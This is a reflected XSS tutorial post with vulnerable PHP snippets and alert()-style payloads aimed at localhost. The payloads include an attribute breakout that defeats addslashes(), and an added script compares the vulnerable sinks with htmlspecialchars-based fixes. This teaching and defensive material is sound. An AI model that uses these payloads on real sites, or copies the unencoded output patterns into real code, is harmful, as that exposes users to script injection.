There are many injection vectors and many filter-bypass techniques; collections of them are easy to find around the web. The examples below stick to the basics.
Basic example
- Code snippet from test.php
---------------------------------
<?php
// Reflected XSS: the query parameter is written straight into the page
// without any output encoding.
$name=$_GET['name'];
print $name;
?>
---------------------------------
The input is neither filtered nor encoded, so an attacker can inject JavaScript. Example:
http://127.0.0.1/test.php?name=<script>alert("XSS")</script>
A popup with the message "XSS" is displayed: the JavaScript executed in the victim's browser.
Another example
- Code snippet from test.php
-------------------------------------------
<?php
// addslashes() only prefixes ' " \ and NUL with a backslash. It was made
// for string literals, not for HTML: the browser still sees the quote.
$name=addslashes($_GET['name']);
print '<table name="'.$name.'"></table>';
?>
-------------------------------------------
Not an advanced example, only a bit more involved.
http://127.0.0.1/test.php?name="><script>alert(String.fromCharCode(88,83,83))</script>
Why this vector? The leading " closes the "name" attribute of the "table" tag, and the > closes the tag itself, so what follows is parsed as new markup. addslashes() turns that quote into \", but HTML has no backslash escaping: the backslash just becomes part of the attribute value and the quote still terminates it. Why String.fromCharCode? Because any quote inside the script body would also get a backslash (alert(\"XSS\") is a JavaScript syntax error), so the payload builds the string "XSS" from character codes 88,83,83 and needs no quotes at all. Injection done.
Simple example
- Code snippet from modules.php
---------------------------------------------------------------------------
if (isset($name)) {
.................... etc................
} else {
// The message ("The file modules/<name>/<mod_file>.php does not exist") is
// sent to the browser with $name embedded unencoded.
die("Le fichier modules/".$name."/".$mod_file.".php est inexistant");
---------------------------------------------------------------------------
The "name" variable is attacker-controlled (the script reads $name directly, which with register_globals enabled is populated from the query string) and the die() message echoes it without any encoding, so JavaScript can be injected just as easily. Example:
http://127.0.0.1/modules.php?name=<script>alert("XSS")</script>
How to fix?
Simple way: encode the value for the HTML context at the point of output with htmlspecialchars() or htmlentities(), and pass ENT_QUOTES so that single quotes are encoded too (otherwise a value placed in a single-quoted attribute can still break out).
Example : $name=htmlspecialchars($_GET['name'], ENT_QUOTES, 'UTF-8');
Another way: filter out every character that can be used for XSS (there are a lot of them). Blocklists like this are fragile; a single missed character or encoding trick and the filter is bypassed.
The best way is the first method, applied consistently to every value that ends up in the page. Note that the encoding has to match where the value lands: the examples above are plain HTML text and a quoted attribute; a value written into a JavaScript block or a URL needs encoding for that context instead.
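To make the difference between the three sinks concrete, here is an added example (not part of the original post) that runs the page's two vulnerable snippets and a hardened version against a few constructed payloads from the command line, and parses the resulting HTML with DOMDocument to see whether a script element or an on* event handler actually made it into the document. The payload list, the helper names and the use of DOMDocument as a checker are this example's assumptions, not the post's; it needs PHP with the dom extension (php xss_demo.php).

```php
<?php
// Added example: compares the post's unencoded and addslashes() sinks with a
// htmlspecialchars()-based fix. Requires the dom extension. Payloads below are
// constructed test inputs, not a complete list of XSS vectors.

// Sink 1: the original test.php body, written out unencoded.
function render_raw(string $name): string {
    return $name;
}

// Sink 2: the original addslashes() attribute example. HTML has no backslash
// escaping, so \" still terminates the attribute and the payload breaks out.
function render_addslashes(string $name): string {
    return '<table name="' . addslashes($name) . '"></table>';
}

// Hardened: encode for the HTML context at the point of output. ENT_QUOTES
// encodes both " and ' so the value cannot close a quoted attribute;
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying the string.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_hardened_body(string $name): string {
    return h($name);
}

function render_hardened_attr(string $name): string {
    return '<table name="' . h($name) . '"></table>';
}

// Parse the fragment the way a browser roughly would and report whether a
// <script> element or any on* attribute (onerror, onload, ...) exists in the
// DOM. Payload text that stays inside an attribute value is NOT flagged,
// which is exactly the distinction a crude substring check would get wrong.
function executes_script(string $html): bool {
    libxml_use_internal_errors(true);               // tolerate sloppy markup
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();

    if ($doc->getElementsByTagName('script')->length > 0) {
        return true;
    }
    foreach ($doc->getElementsByTagName('*') as $el) {
        foreach ($el->attributes as $attr) {
            if (stripos($attr->name, 'on') === 0) {
                return true;
            }
        }
    }
    return false;
}

// Constructed payloads: the two from the post plus an event-handler variant.
$payloads = [
    '<script>alert("XSS")</script>',
    '"><script>alert(String.fromCharCode(88,83,83))</script>',
    "'><img src=x onerror=alert(1)>",
];

$sinks = [
    'raw body         ' => 'render_raw',
    'addslashes attr  ' => 'render_addslashes',
    'hardened body    ' => 'render_hardened_body',
    'hardened attr    ' => 'render_hardened_attr',
];

foreach ($payloads as $p) {
    printf("payload: %s\n", $p);
    foreach ($sinks as $label => $fn) {
        $out = $fn($p);
        printf("  %s %s   %s\n", $label, executes_script($out) ? 'INJECTED' : 'safe    ', $out);
    }
}
```

Running it shows the raw sink executing all three payloads, the addslashes() sink executing only the one that starts with a double quote (the others stay trapped inside the attribute value, which is why the attribute-breakout vector is chosen in the post), and both hardened sinks marked safe for every payload, with the angle brackets and quotes visible as entities in the output.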
This post originally from -- J|nX